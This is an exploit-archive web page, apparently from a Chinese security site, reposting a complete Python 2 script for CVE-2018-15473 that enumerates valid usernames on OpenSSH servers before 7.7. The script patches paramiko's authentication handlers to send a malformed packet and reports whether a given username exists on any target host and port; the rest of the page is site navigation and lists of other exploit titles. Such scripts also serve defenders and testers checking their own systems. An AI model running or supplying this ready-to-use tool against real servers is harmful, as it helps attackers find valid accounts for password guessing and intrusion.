首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
OpenSSH < 7.7 - User Enumeration
来源:https://leapsecurity.io 作者:LeapSecurity 发布时间:2018-12-05  
#!/usr/bin/env python2
# CVE-2018-15473 SSH User Enumeration by Leap Security (@LeapSecurity) https://leapsecurity.io
# Credits: Matthew Daley, Justin Gardner, Lee David Painter
 
 
import argparse, logging, paramiko, socket, sys, os
 
class InvalidUsername(Exception):
    pass
 
# malicious function to malform packet
def add_boolean(*args, **kwargs):
    pass
 
# function that'll be overwritten to malform the packet
old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[
        paramiko.common.MSG_SERVICE_ACCEPT]
 
# malicious function to overwrite MSG_SERVICE_ACCEPT handler
def service_accept(*args, **kwargs):
    paramiko.message.Message.add_boolean = add_boolean
    return old_service_accept(*args, **kwargs)
 
# call when username was invalid
def invalid_username(*args, **kwargs):
    raise InvalidUsername()
 
# assign functions to respective handlers
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = service_accept
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = invalid_username
 
# perform authentication with malicious packet and username
def check_user(username):
    sock = socket.socket()
    sock.connect((args.target, args.port))
    transport = paramiko.transport.Transport(sock)
 
    try:
        transport.start_client()
    except paramiko.ssh_exception.SSHException:
        print '[!] Failed to negotiate SSH transport'
        sys.exit(2)
 
    try:
        transport.auth_publickey(username, paramiko.RSAKey.generate(2048))
    except InvalidUsername:
        print "[-] {} is an invalid username".format(username)
        sys.exit(3)
    except paramiko.ssh_exception.AuthenticationException:
        print "[+] {} is a valid username".format(username)
 
# remove paramiko logging
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
 
parser = argparse.ArgumentParser(description='SSH User Enumeration by Leap Security (@LeapSecurity)')
parser.add_argument('target', help="IP address of the target system")
parser.add_argument('-p', '--port', default=22, help="Set port of SSH service")
parser.add_argument('username', help="Username to check for validity.")
 
if len(sys.argv) == 1:
    parser.print_help()
    sys.exit(1)
 
args = parser.parse_args()
 
check_user(args.username)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Xorg X11 Server (AIX) - Local
·NUUO NVRMini2 3.9.1 - Authenti
·Microsoft Lync for Mac 2011 -
·HasanMWB 1.0 SQL Injection
·HP Intelligent Management Java
·Textpad 8.1.2 - Denial Of Serv
·Emacs movemail Privilege Escal
·i-doit CMDB 1.11.2 - Remote Co
·NEC Univerge Sv9100 WebPro 6.0
·FutureNet NXR-G240 Series Shel
·Apache Superset 0.23 - Remote
·MiniShare 1.4.1 HEAD / POST Bu
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved